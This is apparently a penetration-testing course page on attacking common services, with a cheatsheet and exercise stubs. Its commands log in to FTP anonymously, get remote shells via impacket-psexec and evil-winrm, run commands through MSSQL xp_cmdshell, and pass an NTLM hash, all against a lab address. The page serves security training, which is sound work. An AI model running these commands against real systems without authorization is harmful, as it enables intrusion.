Attacking Common Services
Exploitation
Overview
Exploit techniques for FTP, SSH, SMB, RDP, SQL, and other services.
3
Exercises
3
Flashcards
1
Mind Maps
Cheatsheet
FTP (21)
ftp 10.10.10.5 # Connect to FTP server anonymous/anonymous # Try anonymous login
SSH (22)
ssh user@10.10.10.5 # Connect via SSH with password ssh -i id_rsa user@10.10.10.5 # Connect via SSH with private key
SMB (445)
smbclient //10.10.10.5/share -U user # Connect to SMB share impacket-psexec user:pass@10.10.10.5 # Get shell via PsExec (needs admin)
WinRM (5985)
evil-winrm -i 10.10.10.5 -u user -p pass # Get shell via WinRM
MSSQL (1433)
impacket-mssqlclient user:pass@10.10.10.5 # Connect to MSSQL xp_cmdshell 'whoami' # Execute command via xp_cmdshell
Command Examples
Common Pitfalls
- Ignoring non-standard ports
- Not trying default creds
Exam Survival Tips
- Always check for anonymous access
- Look for credential reuse
Exercises
View All
case file
medium
<pre>PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
445/tcp open ...
fill command
medium
Write the evil-winrm command to connect to 10.10.10.5 as user with password pass123:...
fill command
hard
Write the impacket-psexec command to get a shell as admin with NTLM hash aad3b435b51404eeaad3b435b51...